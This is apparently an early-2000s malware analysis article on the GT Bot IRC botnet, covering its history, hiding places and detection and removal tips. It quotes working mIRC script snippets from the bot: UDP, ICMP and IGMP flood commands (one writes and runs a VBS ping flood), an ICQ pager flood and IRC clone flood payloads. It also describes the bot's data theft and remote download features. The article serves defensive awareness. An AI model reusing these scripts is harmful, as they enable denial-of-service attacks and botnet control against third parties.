GT Bot (Global Threat) History and Original Findings

GT Bot (Global Threat) first appeared nearly two years ago and was written by Sony, mSg and DeadKode. The GT Bot uses the legitimate mIRC program as its main core and a program called HideWindow or a vbs script to make mIRC invisible to the host computer. mIRC is scripted to create an IRC Bot which responds to remote commands from the Bot Master. When run mIRC loads the scripts and the hiding program and connects to the predetermined IRC server and channel to await commands. As the scripts are open source it is very easy to rewrite or edit them with your own variations and custom command triggers. This is done often and accounts for the wide amount of variants of this bot. Some have undergone simple edits and others are far more creative with additional scripts and routines, some even have encryption added to protect logins and access to commands. In some places GT Bot has also been referred to as Aristotles or IRC Trojan Aristotles, this is still GT Bot though and was called Aristotles as a variant that was widespread was controlled by the nickname Aristotles.

As drawn attention to earlier, many variants exist and it is all too easy to change the names of the files and the filename extensions. One filename that endures through nearly every version is MIRC.INI as by default mIRC needs this file to load properly and if it does not find one, it would create a new one which would stop the Bot from launching. A search of the hard drive for mirc.ini would reveal the location of each copy of mIRC as the two must both exist in the same directory. If you have one version of mIRC installed and a search reveals two mirc.ini files, it is possible you have a GT Bot infection. Simply counting the number of mirc.ini files against the number of mIRC versions you can account for can reveal a lot of these infections easily. mIRC can be hex edited to look for a different file other than mirc.ini when it is loaded and I have seen this done in a few cases and have examples of this variant. A very small percentage have done this, so the mirc.ini search is always the best initial method to use when looking for a GT Bot infection. One example of a bot that had been hex edited to load a file other than mirc.ini used the filename slave.fnt along with many other files with the made up *.FNT extension. I will be listing a lot of default names that these files create so that it provides a useful reference when searching. However, this is not a fixed and set in stone guide, because names and extensions are so easy to change and are often changed.

GT Bots are also installed into various paths, with the most popular ones being the Windows and the Windows/System directories. Some of the smarter versions of GT Bot hide in the C:\Windows\Fonts directory and for a good reason. If you opened the C:\Windows\Fonts directory in normal view, you would not see executables, scripts or other directories in there. It has become a popular hiding place for GT Bot. Windows Explorer would show these hidden files or directories and so would MSDOS mode. I will provide examples below.

To find hidden directories in the fonts directory, go to the C:\ drive and open the Windows directory and then open the Fonts directory. Leaving Fonts as the focused Window on the top, click on the Windows Start button and go to Run. A run prompt will appear and you need to type the word "command" without the quotes into the box and click OK. You should see an MSDOS prompt window appear showing C:\Windows\Fonts>. Now type "DIR/P/W" without the quotes and you will see a directory listing. Look closely for names in [ ] as these indicate directories. You should see [ . ] and [ .. ] which can be disregarded, but beware of any other directories in there. In the illustration below, you will see [ GTBot ] which was a directory I created in there as an example by doing "mkdir GTBot" Often with GT Bot infections a directory called FONT will exist inside the real Fonts directory which is where the Bot is often hidden. To access this in a normal view go to Start and then Run and type the full path. For example C:\Windows\Fonts\GTBot and click OK and it will open that directory. A lot of the files will be hidden files, so it is wise to use folder options to show hidden and system files and file extensions for known file types. Some bots are a little more devious and will create a directory inside of Fonts with a name like VerdanaLarge.ttf so at a quick glance, it looks like a font file, but the [ ] around the name will always give it away as a directory and you should take note of this. Images 1 | 2

To enable view all files and extensions, click on Start then Settings and then Folder Options. see figure1 The Folder Options window should then appear see figure2 Click on View the centre one of the three tabs. Then check the Show All Files radio button and uncheck the Hide file extensions for known types check box.

If a GT Bot is found it can be dealt with in a few ways. One of which is to use a process viewer and kill the hidden processes that it is running and then delete all of the files. Alternatively, a Trojan scanner will sometimes detect some of the files and remove them. Remember, as GT Bot is so widespread and easy to edit, many variants will exist that could not possibly be detected by standard signature file scanning and this is why the use of a process monitor is always by far the best method from my own experiences in dealing with dozens of these GT Bots.

When GT Bots connect to IRC, they are usually logged into by their Master who will then issue them with commands.You will get a clearer picture of this, by looking at the screen captures [URL] which show various activity from spamming and flooding to all out DDoS attacks. A lot can be learned about the structuring of BotNets, by observation if you are able to track them down. Typically, GT BotNets can be traced in only a matter of minutes by reading the script files after the Bot package has been executed and extracted. All of the connection information is within the scripting and often in the remote.ini. The IRC server address which is usually a dynamic address, channel to join the nickname ident and real name criteria for the Bot to assume when executed. Dynamic addresses are often used, so BotNets can be redirected to other IRC servers and I have explained more about Dynamic addresses [here URL] because they are relevant to all types of bots. On IRC servers that are owned and operated by the BotNet Master, great lengths are often taken in order to hide the channel that the Bots join and to secure it from curious people accidentally finding or stumbling across it.
 

Often, channel names are used, which contain special characters such as #Ãßÿ¥¤¢š¿øùô with a channel key that again uses special characters like ¥ðæÅÞ ‡. So to join the channel you would have to type /join #Ãßÿ¥¤¢š¿øùô ¥ðæÅÞ ‡ which is /join <#chan> <key>. I explain IRC modes and what they do with more relevant information [hereURL] as again it applies to all genre of Bots. The IRCD (IRC Server Software) of choice is usually Unreal IRCD [URL http://www.unrealircd.com] as it is easy to set up and configure and has some rather unique modes unavailable in other similar IRCD software, modes that include +u which hides the user nicknames list from anyone that joins the channel, giving the appearance that the channel is completely empty and host masking in order to stop a person from obtaining
IP addresses. Even if the channel had several hundred Bots in it, they would remain invisible, unless you know the workarounds which I describe in the IRC modes section.

Once logged into, the Bots can be commanded with trigger commands sent to the IRC channel. The bot will normally respond to certain trigger words that the script is monitoring the channel for. For example, here is a snippet of code from a GT Bot and an explanation of what it does.

if ($1 == !icqpage) { if ($2 == $null) { /msg # Error/Syntax:(!icqpage from subject body to) | halt } { .set %icqfrom $2- | .set %icqsubject $3- | .set %icqbody $4- | .set %icqto $5 |
.sockclose mICQ* | .timer 1 3 .sockopen mICQ wwp.icq.com 80 } }

When a Bot Master sends the text "!icqpage from_me the_subject a_pager_for_you 111111111111" the Bot will open a connection to wwp.icq.com on remote port 80
and send that string of information and even prompt the user if they mis-entered the information. Each time that command is sent, ICQ account 111111111111 would get one WWW Pager from each Bot. Several hundred Bots doing this repeatedly, would generate quite a huge flood of these pagers. At the receiving end, they can easily all be closed all at once or added to ignore, but it is still somewhat annoying to the target. Worse are the DDoS attacks these can create, with various different types of built in attacks. I will briefly try and explain some of them below.

Packet Of Death : This piece of code generates UDP packets to random ports in the range 1000 - 6669 of user inputted size and amount "!packet 10.0.01 9999 3000" would attempt to send 9999 bytes of data 3000 times to IP Address 10.0.01 on random ports between the ranges of port 1000 to port 6669. Once again, if the information is added incorrectly, the GT Bot will message the channel and report the correct syntax to use. When the attack has finished, the GT Bot will message the Master that it has completed it's task and is ready to accept further orders.

alias packetofdeath {
if ($3 = $null) { notice $nick Error Please use !packet address size amount | halt }
if ($chr(46) !isin $1) || ($2 !isnum) || ($3 !isnum) { notice $nick Error Please use !packet address size amount | halt }
if ($remove($1,$chr(46)) !isnum)
{ notice $nick Error no letters may be contained in the ip | unset %packet.* | halt }
.notice $nick Now Packeting $1 with $2 bytes $3 times
set %packet.ip $1
set %packet.bytes $2
set %packet.amount $3
set %packet.count 0
set %packet.port $rand(1,6) $+ $rand(0,6) $+ ($rand(0,6)
$+ $rand(0,9)
:start
if (%packet.count >= %packet.amount) { sockclose packet | unset %packet.* | .notice $nick Packeting has completed | halt }
inc %packet.count 1
/sockudp -b packet 60 %packet.ip %packet.port %packet.bytes
%packet.bytes
goto start

ICMP an ICMP attack allowing variable sizes of packets and amounts which uses writes and runs a VBS file that then runs PING.EXE with parameters. This piece of code, on command, sends a ping flood of user definable size and amount to the target IP Address. As you can most likely imagine, it hardly takes a genius to figure out that many machines sending a lot of malicious traffic, can easily cause chaos and take down high bandwidth targets very effectively, even if they are denying the ICMP at the router. This has the effect like someone snorkel diving. If your snorkel becomes full of water, you can close your mouth to stop yourself swallowing the water but you still cannot breathe.

This form of attack, is generally referred to as a bandwidth saturation attack, because it stops any useful data from getting in or out as it completely fills the pipes. When this command is run, it removes icmp.vbs if it exists and writes a new file called icmp.vbs which it will then run. Once icmp.vbs has been run, it in turn runs PING.EXE with the parameters

"PING -N <Number of Packets> -L <Size in Bytes> -W 0 <IP Address of Target>"

The Parameter -W is set at 0 which is timeout to wait for a reply before sending the next ping echo request, meaning it will send a constant stream instead of waiting for a reply to the last echo. See image here

To this form of attack, a firewall would stop the Pings reaching the machine and the machine would run normally behind the firewall unaffected by the attack only with no real communication with the Internet, effectively silenced or offline to anybody trying to access it remotely, which if it is a machine providing web services, such as a website, it can be catastrophic financially to a business with the web site completely unaccessible. It might as well be switched off or unplugged from the network, because the attack rages on. Most DDoS attacks die out eventually, usually when the attacking machines go offline or the owner realizes that they are attacking someone. Of course, attacks such as this, can be successfully filtered upstream of the target by the Internet Service or Upstream Provider, as long as the specific attack can be identified and a ruleset crafted for it.

It would be worth checking any machine for the existence of ICMP.VBS to make sure it is not taking part in malicious attacks.

if ($1 == !icmp) { if ($2 == $null) { /msg # E rror/Syntax:(!icmp ip packetsize howmany, ie: !icmp 127.0.0.1 2000 1000) | halt }| .remove icmp.vbs | .write icmp.vbs Set src3 =
CreateObject("Wscript.shell") | .write icmp.vbs src3.run "command /c ping -n $4 -l $3 -w 0 $2 ",0,true | .run icmp.vbs }

IGMP is an attack that uses a third party DOS based IGMP tool to send malicious Fragmented IGMP Packets to the target machine. This routine is almost identical to the above, only it runs a third party tool called IGMP.EXE which has preset parameters and only needs the IP address to be inputted. Fragmented IGMP packets will often cause un-patched Windows 98 users to BSoD (Blue Screen of Death) or in some cases cause their computer to force reboot. This form of attack will again saturate bandwidth, even if the target is protected from IGMP Protocol Packets. As shown above, a search for IGMP.VBS and IGMP.EXE is always worthwhile to make sure that the machine is not being made to send malicious traffic to third parties.

if ($1 == !igmp) { if ($2 == $null) { /msg # Error/Syntax:(!igmp ip.here) | halt } | .remove igmp.vbs | .write igmp.vbs Set src3 = CreateObject("Wscript.shell") | .write igmp.vbs src3.run "command /c igmp $2 ",0,true | .run igmp.vbs }

Other similar attacks that are often included are Pepsi, Shiver, Fraggle and ATH0 (Aimed at machines with dialup connection. AT H & 0 are the commands to hang up the modem "disconnect")

The GT Bot is also used very largely to attack other IRC Networks by flooding channels with huge amounts of text or messages to individual users. A lot of these attacks, on a small scale can be ignored, but on a large scale they cause wide scale IRC Server disruption and in many instances with lower bandwidth providers will down the whole server and any others running on the same network.

If a BotNet of 200 GT Bots created 5 clones each to join an IRC Server that would generate a total of 1000 connections. Most small IRC Servers allow 256 simultaneous connections up to a maximum of 1024. A large amount of this form of traffic rapidly uses all of the available ports and in a lot of cases the whole lot hitting almost all at once will stall the whole Server. GT Bot often enter an IRC in huge amounts and then join target channels and flood them with endless repetitive data, which causes normal users to become disconnected or their IRC client to freeze, because it cannot process the rapidly scrolling flood of garbage data fast enough. These kinds of floods often run up to 150 kbps of data through the IRC Server and will often incur the owner of the free service penalties for extra bandwidth consumption.

From my own personal studies of BotNets, I have seen many evolve and grow from nearly nothing, because I have sometimes found them within hours of their first being created. By far, the most successful and largest BotNets that have grown the most rapidly, have been ones that exploited some other exploit, by acting like a Worm or infection of insecure Windows 2000 IIS Servers (Internet Information Server) or the infection of hosts with existing Trojan infections, such as SubSeven. [Interview with mobman the SubSeven Author here URL] Below is a paste of some of the garbage data that Bot FloodNets often send to IRC channels and users. If you can imagine this data being sent constantly over and over again by a large amount of Clones, until the attack is called off or the IRC Server goes offline.

Pure Pewp
/timer 1 5 /sockwrite -n $sock(clone*,%cc) PRIVMSG $2
p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w pp e wp p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p

Death by Math
/timer 1 16 /sockwrite -n $sock(clone*,%cc) PRIVMSG
$2 ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼
½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾

GT Special
/timer 1 22 /sockwrite -n $sock(clone*,%cc) PRIVMSG $2
3GT 4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT
4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT

Often BNC (Bounce For IRC) is used to load clones onto IRC Networks and works in a very similar way to loading clones via a WinGate. This is done to evade various bans, which may be in effect and to be able to reconnect clients from banned hosts or domains.

These bots have nearly the same capability as common middle of the range Trojans and can get various information about the system it is installed to and output it to an IRC channel. An example can be seen below of a version that we tested on one of our laboratory machines.

Info Date:[Monday September 10 2001] Time:[09:42 pm] OS:[Windows98] UpTime:[55mins 36secs] Current-URL:[http://pv1fd.pav1.hotmail.msn.com/cgi- bin/HoTMaiL?
curmbox=F000000001&a=853e1cbe0240dc4d970aac200fec8216&_lang=EN]
Name: LockDownLaboratory()ICQ:[1111111111.uin] Key[H922W2R887TH2KDDPCP9F8FDH]

ICQ Number and Windows product key edited for security purposes.

Other information can also be easily gathered including size of logical drives, space used and remaining space. Connection type and up and down speed available ram and cpu speed. This is usually done by adding ready made *.dll files such as, moo.dll or info.dll to the package and calling the *.dll and outputting the result to the Bot channel. Many bots also search for media files such as,*.mpg *.mpeg*.rm *.ram *.mp3 and serve on IRC as fileservers or can just open an fserv on drive C:\ or any other available drive. (FServ is the IRC equivalent to FTP only it is a read only service)

The ability ro delete or run commands and files is also usually an inclusion in GT Bot and many also have a Web Downloader included so it can be run on command and fetch a predetermined update or new version and then install it. Some have the ability to write new scripts, so all the Master has to do is give the GT Bot a new script to load by pasting it line by line into the channel. The Bot will then write the script and it can be loaded and the new added commands become accessible.

GT Bot is often used to scan for Trojan compromised hosts and then outputs the IP Address of any hosts found into the channel. Some even go as far as to connect to SubSeven infections and make them updated from the web with a GT Bot which once successfully downloaded, will be run and will remove the SubSeven infection and replace it.

Conclusion

It can be safely concluded that the spread of these Bots and the number of variants is set to increase significantly in the next year or so, until the public as a whole becomes more aware of the threat and takes proper action to avoid infection. With the increase in the number of BotNets there will also be an increase in the number of DDoS attacks reported as the two go hand in hand together. It is evident that awareness and education is the best policy that can be adopted.